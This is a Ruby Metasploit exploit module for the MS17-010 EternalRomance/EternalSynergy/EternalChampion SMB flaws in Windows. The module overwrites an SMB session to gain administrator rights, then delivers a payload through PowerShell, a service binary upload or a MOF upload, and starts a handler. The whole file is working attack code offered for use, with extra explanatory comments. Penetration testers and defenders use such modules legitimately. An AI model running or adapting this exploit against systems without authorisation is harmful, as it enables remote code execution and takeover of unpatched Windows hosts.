##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
# Local Security Settings >
# Local Policies >
# Security Options >
# Network Access: Sharing and security model for local accounts

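class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
  include Msf::Exploit::Remote::SMB::Client::Psexec
  include Msf::Exploit::Remote::CheckModule
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Auxiliary::Report

  # Registers the module metadata, options and advanced options with the framework.
  #
  # The MS17-010 check is delegated to auxiliary/scanner/smb/smb_ms17_010 via the
  # CheckModule mixin ('CheckModule' default option). SMB::ProtocolVersion is
  # deregistered because the Psexec_MS17_010 mixin drives the SMB dialect itself.
  #
  # @param info [Hash] module info merged by +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',
        'Description' => %q{
          This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
          primitive. This will then be used to overwrite the connection session information as an
          Administrator session. From there, the normal psexec payload code execution is done.

          Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
          Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
          exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
          named pipe.
        },
        'Author' => [
          'sleepya', # zzz_exploit idea and offsets
          'zerosum0x0',
          'Shadow Brokers',
          'Equation Group'
        ],
        'License' => MSF_LICENSE,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',
          'WfsDelay' => 10
        },
        'References' => [
          [ 'MSB', 'MS17-010' ],
          [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests
          [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests
          [ 'CVE', '2017-0147'], # for EternalRomance reference
          [ 'URL', 'https://github.com/worawit/MS17-010' ],
          [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
          [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
          # T1021_002_SMB_WINDOWS_ADMIN_SHARES replaces the deprecated T1077_WINDOWS_ADMIN_SHARES;
          # it is listed exactly once (the previous entry was duplicated).
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_001_POWERSHELL ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1569_002_SERVICE_EXECUTION ]
        ],
        'Payload' => {
          'Space' => 3072,
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'Automatic', {} ],
          [ 'PowerShell', {} ],
          [ 'Native upload', {} ],
          [ 'MOF upload', {} ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2017-03-14',
        'Notes' => {
          'AKA' => [
            'ETERNALSYNERGY',
            'ETERNALROMANCE',
            'ETERNALCHAMPION',
            'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred
          ],
          'Stability' => UNKNOWN_STABILITY,
          'Reliability' => UNKNOWN_RELIABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ])
      ]
    )

    register_advanced_options(
      [
        OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
        OptString.new('SERVICE_FILENAME', [false, "Filename to be used on target for the service binary", nil]),
        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
        OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub", nil])
      ]
    )

    deregister_options('SMB::ProtocolVersion')
  end

  # Ensures that SERVICE_STUB_ENCODER, when set, names an encoder the framework
  # actually knows about. An unset or blank value is accepted (no encoder).
  #
  # @raise [Msf::OptionValidateError] if the named encoder cannot be found
  # @return [void]
  def validate_service_stub_encoder!
    service_encoder = datastore['SERVICE_STUB_ENCODER']
    return if service_encoder.nil? || service_encoder.empty?

    encoder = framework.encoders[service_encoder]
    return unless encoder.nil?

    raise Msf::OptionValidateError.new(
      {
        'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}"
      }
    )
  end

  # Framework entry point for the exploit run.
  #
  # Option validation happens before the +begin+ block on purpose: an invalid
  # SERVICE_STUB_ENCODER should surface to the framework as an option error
  # rather than being reported by the catch-all +rescue+ below. The MS17-010
  # session step (+eternal_pwn+) and the psexec flow (+smb_pwn+) are provided
  # by the included mixins; +eternal_cleanup+ always runs so the target's
  # session state is restored whether or not the run succeeded.
  #
  # @return [void]
  def exploit
    validate_service_stub_encoder!

    begin
      if datastore['SMBUser'].present?
        print_status("Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...")
      end
      eternal_pwn(datastore['RHOST'])
      smb_pwn
    rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e
      # Mixin-level failure: the message already explains what went wrong.
      print_error(e.message)
    rescue ::Errno::ECONNRESET,
           ::Rex::Proto::SMB::Exceptions::LoginError,
           ::Rex::HostUnreachable,
           ::Rex::ConnectionTimeout,
           ::Rex::ConnectionRefused => e
      # Transport / authentication failures are reported with their class for context.
      print_error("#{e.class}: #{e.message}")
    rescue => error
      # Anything else is unexpected; keep the backtrace so the failure is debuggable.
      print_error(error.class.to_s)
      print_error(error.message)
      print_error(error.backtrace.join("\n"))
    ensure
      eternal_cleanup # restore session
    end
  end

  # Runs the psexec-style delivery selected by the current target, then starts
  # the payload handler.
  #
  # 'Automatic' probes for powershell.exe at PSH_PATH on SHARE and prefers the
  # PowerShell delivery when it is found, otherwise falls back to the native
  # service binary upload. A blank SERVICE_FILENAME is treated like an unset
  # one so the service binary never ends up with an empty name.
  #
  # @return [void]
  def smb_pwn
    service_filename = datastore['SERVICE_FILENAME'].presence || "#{rand_text_alpha(8)}.exe"
    service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''
    share = datastore['SHARE']

    case target.name
    when 'Automatic'
      if powershell_installed?(share, datastore['PSH_PATH'])
        print_status('Selecting PowerShell target')
        execute_powershell_payload
      else
        print_status('Selecting native target')
        native_upload(share, service_filename, service_encoder)
      end
    when 'PowerShell'
      execute_powershell_payload
    when 'Native upload'
      native_upload(share, service_filename, service_encoder)
    when 'MOF upload'
      mof_upload(share)
    end

    handler
  end
end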